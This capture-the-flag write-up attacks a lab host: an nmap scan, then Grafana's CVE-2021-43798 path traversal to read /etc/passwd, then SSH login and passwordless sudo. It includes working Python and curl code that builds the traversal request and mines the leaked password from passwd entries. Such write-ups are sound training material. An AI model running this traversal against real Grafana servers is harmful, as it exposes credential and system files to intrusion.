Enumeration

# Nmap 7.92 scan initiated Sat May  7 12:53:58 2022 as: nmap -vvv -p 22,111,3000,5000 -sS -sV -sC -oN 10.10.245.226.kubernetesforyouly.nmap.txt 10.10.245.226
Nmap scan report for 10.10.245.226
Host is up, received echo-reply ttl 61 (0.19s latency).
Scanned at 2022-05-07 12:53:59 PDT for 114s

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:35:e1:4f:4e:87:45:9e:5f:2c:97:e0:da:a9:df:d5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTRQx4ZmXMByEs6dg4VTz+UtM9X9Ljxt6SU3oceqRUlV+ohx56xdD0ZPbvD0IcYwUrrqcruMG0xxgRxWuzV+FQAJVQe76ED966+lwrwAnUsVFQ5apw3N+WKnD53eldUZRq7/2nGQQizrefY7UjAGX/EZonSVOWZyhVyONu2VBBwg0B0yA3UBZV+yg+jGsrZ9ETEmfNbQRkbodEAwoZrGQ87UEdTkfj+5TGmfzqgukmBvvVV7KoXgSQIZNkqRmkAVKKXeEfydnOR37KMglBUXIR/50jkIswxWbNk2OtS6fz6UiPeEY39f4f0gwLx/HwUyel9yzH4dkDb+LBS6X/X9b9
|   256 b2:fd:9b:75:1c:9e:80:19:5d:13:4e:8d:a0:83:7b:f9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAqCgW5Mlx2VpC61acc0G4VMZUAauQDoK5xIzdHzdDLPXt0GqsoIw1fuwTSSzSy8RFmGU5PNHiWn0egoUwlXdc4=
|   256 75:20:0b:43:14:a9:8a:49:1a:d9:29:33:e1:b9:1a:b6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFZ/jrfDX1aK1I0A/sLRVb2qoCF9xHWbVW+gBCV8dSmg
111/tcp  open  rpcbind syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
3000/tcp open  ppp?    syn-ack ttl 60
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sat, 07 May 2022 19:54:40 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sat, 07 May 2022 19:54:06 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sat, 07 May 2022 19:54:11 GMT
|_    Content-Length: 0
5000/tcp open  http    syn-ack ttl 60 Werkzeug httpd 2.0.2 (Python 3.8.12)
|_http-title: Etch a Sketch
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: Werkzeug/2.0.2 Python/3.8.12
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.92%I=7%D=5/7%Time=6276CE5E%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Control
SF::\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpire
SF:s:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\x
SF:20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content
SF:-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protecti
SF:on:\x201;\x20mode=block\r\nDate:\x20Sat,\x2007\x20May\x202022\x2019:54:
SF:06\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found</
SF:a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Typ
SF:e:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x
SF:20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCach
SF:e-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPrag
SF:ma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOn
SF:ly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Op
SF:tions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Sat
SF:,\x2007\x20May\x202022\x2019:54:11\x20GMT\r\nContent-Length:\x200\r\n\r
SF:\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\
SF:.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=
SF:utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessi
SF:onReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/p
SF:lain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Req
SF:uest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Typ
SF:e:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x
SF:20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found\r
SF:\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=
SF:utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r
SF:\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt%
SF:252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opti
SF:ons:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;\
SF:x20mode=block\r\nDate:\x20Sat,\x2007\x20May\x202022\x2019:54:40\x20GMT\
SF:r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found</a>\.\n\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  7 12:55:53 2022 -- 1 IP address (1 host up) scanned in 114.99 seconds
| Port     | Service  | Notes |
|----------|----------|-------|
| 22/tcp   | SSH      | Username came from a comment in the CSS of the webapp on port 5000; password came from the grafana account's GECOS field in /etc/passwd, read through the Grafana path traversal (CVE-2021-43798) on port 3000. |
| 111/tcp  | RPC Bind | |
| 3000/tcp | HTTP     | Grafana 8.3.0 (nmap reports it as "ppp?", but the 302 to /login with the redirect_to cookie is Grafana's login redirect) |
| 5000/tcp | HTTP     | Werkzeug 2.0.2 / Python 3.8.12, "Etch a Sketch" webapp |
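As an added example (not part of the original writeup), the following Python does the two enumeration checks this table relies on offline: it recognises Grafana's login redirect from a raw banner like the one nmap captured on port 3000, and it decides whether a reported Grafana version falls inside the CVE-2021-43798 range (8.0.0-beta1 through 8.3.0, fixed in 8.0.7, 8.1.8, 8.2.7 and 8.3.1). The sample banner is reconstructed from the nmap GetRequest fingerprint above; the /api/health body is constructed (Grafana answers that endpoint without authentication) and its commit value is a placeholder.

```python
import json
import re
from typing import Optional, Tuple

# Added example for this writeup, not code from the original page.

# Grafana answers unknown paths with a 302 to /login, sets a redirect_to cookie
# and denies framing; all three together are a reliable fingerprint even when
# nmap labels the service "ppp?".
GRAFANA_MARKERS = (
    re.compile(r"^Location:\s*/login\s*$", re.I | re.M),
    re.compile(r"^Set-Cookie:\s*redirect_to=", re.I | re.M),
    re.compile(r"^X-Frame-Options:\s*deny\s*$", re.I | re.M),
)

# First patched release on each affected 8.x minor branch (Grafana's advisory for
# CVE-2021-43798: 8.0.0-beta1 through 8.3.0 affected; fixed in 8.0.7, 8.1.8, 8.2.7, 8.3.1).
FIRST_FIXED_PATCH = {0: 7, 1: 8, 2: 7, 3: 1}


def response_headers(raw: str) -> str:
    """Return the header block of a raw HTTP response (everything before the blank line)."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    return raw.split(sep, 1)[0]


def looks_like_grafana(raw_response: str) -> bool:
    """True when all three Grafana markers appear in the response headers."""
    head = response_headers(raw_response)
    return all(m.search(head) for m in GRAFANA_MARKERS)


def version_from_health(body: str) -> Optional[str]:
    """Extract "version" from a GET /api/health body; None if it is not that JSON."""
    try:
        doc = json.loads(body)
    except ValueError:
        return None
    return doc.get("version") if isinstance(doc, dict) else None


def parse_version(version: str) -> Tuple[int, int, int]:
    """'8.3.0', 'v8.3.0' and '8.0.0-beta1' all map to (major, minor, patch)."""
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised Grafana version: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def vulnerable_to_cve_2021_43798(version: str) -> bool:
    """Affected iff it is an 8.x build older than the first fixed release of its minor branch."""
    major, minor, patch = parse_version(version)
    if major != 8 or minor not in FIRST_FIXED_PATCH:
        return False
    return patch < FIRST_FIXED_PATCH[minor]


# Reconstructed from the nmap GetRequest fingerprint above (CRLF line endings restored).
SAMPLE_BANNER = (
    "HTTP/1.0 302 Found\r\n"
    "Cache-Control: no-cache\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Expires: -1\r\n"
    "Location: /login\r\n"
    "Pragma: no-cache\r\n"
    "Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-Frame-Options: deny\r\n"
    "X-Xss-Protection: 1; mode=block\r\n"
    "Content-Length: 29\r\n"
    "\r\n"
    '<a href="/login">Found</a>.\n\n'
)

# Constructed /api/health body; the commit value is a placeholder, not a real hash.
SAMPLE_HEALTH = '{"commit": "placeholder", "database": "ok", "version": "8.3.0"}'

if __name__ == "__main__":
    print("grafana fingerprint:", looks_like_grafana(SAMPLE_BANNER))
    ver = version_from_health(SAMPLE_HEALTH)
    print("version:", ver, "vulnerable:", vulnerable_to_cve_2021_43798(ver))
```

Against a live target the banner is what `curl -i http://host:3000/` returns and the health document is `curl http://host:3000/api/health`; if a proxy hides that endpoint, the login page's embedded boot data also carries the version string. The range check is only as trustworthy as the version the server reports, so treat a match as a reason to test the traversal, not as proof.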

Exploitation

Grafana 8.3.0 on port 3000 is vulnerable to CVE-2021-43798, an unauthenticated path traversal in the plugin static-file handler (/public/plugins/<plugin-id>/../../...). We used it to read /etc/passwd, and the grafana account's GECOS (comment) field turned out to hold the password, hereiamatctf907. Note that this /etc/passwd belongs to the Grafana container, not the host: root's shell is /bin/ash and the account list is the minimal Alpine set, while the SSH banner says the host is Ubuntu. The scan already hinted at this, since ports 3000 and 5000 answered with TTL 60 against TTL 61 for SSH and rpcbind, one extra hop consistent with container networking.

We found the username on the webapp on port 5000 (the Werkzeug "Etch a Sketch" app). A comment in its CSS led to a pastebin containing a base32 string, OZQWO4TBNZ2A====, which decodes to vagrant.

$ python3 50581.py -H http://10.10.173.247:3000 -f /etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:hereiamatctf907:/home/grafana:/sbin/nologin
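As an added example (not the Exploit-DB 50581 script run above), the following Python shows the two parts of this step: it assembles the CVE-2021-43798 request by hand so the "../" segments reach the server verbatim, and it mines the returned /etc/passwd for the kind of GECOS field that leaked the password here, plus a check that the file comes from an Alpine container rather than the host. The plugin id (alertlist, a core panel in Grafana 8.x) and the traversal depth are assumptions; the sample passwd is an excerpt of the output above.

```python
import socket
from typing import Dict, List, Optional

# Added example for this writeup; not the author's script. The request is built
# by hand because several HTTP client libraries collapse "../" segments before
# sending, which silently turns the traversal into a request for a file that
# does not exist under /public/plugins.

PLUGIN_ID = "alertlist"   # assumption: a core panel plugin shipped with Grafana 8.x
DEPTH = 8                 # assumption: enough "../" to climb from the plugin dir to /


def traversal_path(target_file: str, plugin_id: str = PLUGIN_ID, depth: int = DEPTH) -> str:
    """Build the CVE-2021-43798 path: /public/plugins/<id>/../../.../<file>."""
    return f"/public/plugins/{plugin_id}/" + "../" * depth + target_file.lstrip("/")


def build_raw_request(host: str, port: int, target_file: str) -> bytes:
    """HTTP/1.1 request bytes with the path exactly as built (no normalisation)."""
    path = traversal_path(target_file)
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "User-Agent: grafana-traversal-check\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def fetch_file(host: str, port: int, target_file: str, timeout: float = 5.0) -> Optional[str]:
    """Send the raw request; return the body on a 200, else None (needs network;
    handles the plain Content-Length response Grafana sends for a static file)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_raw_request(host, port, target_file))
        raw = b""
        while chunk := sock.recv(65536):
            raw += chunk
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    if b" 200 " not in status_line:
        return None
    return body.decode(errors="replace")


PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split passwd(5) lines into field dicts; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) == len(PASSWD_FIELDS):
            entries.append(dict(zip(PASSWD_FIELDS, parts)))
    return entries


def suspicious_gecos(entries: List[Dict[str, str]]) -> Dict[str, str]:
    """Heuristic: a single-token GECOS that is not just the account name
    (like hereiamatctf907 on the grafana account) deserves a second look."""
    hits = {}
    for e in entries:
        gecos = e["gecos"].strip()
        if gecos and " " not in gecos and gecos.lower() != e["name"].lower():
            hits[e["name"]] = gecos
    return hits


def looks_like_alpine_container(entries: List[Dict[str, str]]) -> bool:
    """root on /bin/ash and no ordinary users (uid 1000-65533) is the signature of
    a minimal Alpine image, i.e. the file is the Grafana container's, not the host's."""
    root = next((e for e in entries if e["name"] == "root"), None)
    if root is None:
        return False
    humans = [e for e in entries if e["uid"].isdigit() and 1000 <= int(e["uid"]) < 65534]
    return root["shell"] == "/bin/ash" and not humans


# Excerpt of the /etc/passwd the exploit returned above, used as offline sample input.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:hereiamatctf907:/home/grafana:/sbin/nologin
"""

if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print(build_raw_request("10.10.245.226", 3000, "/etc/passwd").decode())
    print("GECOS candidates:", suspicious_gecos(entries))
    print("Alpine container:", looks_like_alpine_container(entries))
```

The curl equivalent is `curl --path-as-is http://10.10.245.226:3000/public/plugins/alertlist/../../../../../../../../etc/passwd`; without --path-as-is curl squashes the dot segments client-side and the request never reaches the traversal. Because the file read happens inside the container, files such as /etc/grafana/grafana.ini or /var/lib/grafana/grafana.db are the next useful targets, not the host's home directories.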

Privilege Escalation

Using the credentials recovered above, vagrant:hereiamatctf907, we SSHed into the host. sudo -l shows that vagrant may run any command as any user without a password ((ALL) NOPASSWD: ALL), so a root shell is one passwordless sudo away.

$ ssh vagrant@$IP
vagrant@johnny:~$ sudo -l
Matching Defaults entries for vagrant on johnny:
    env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on johnny:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL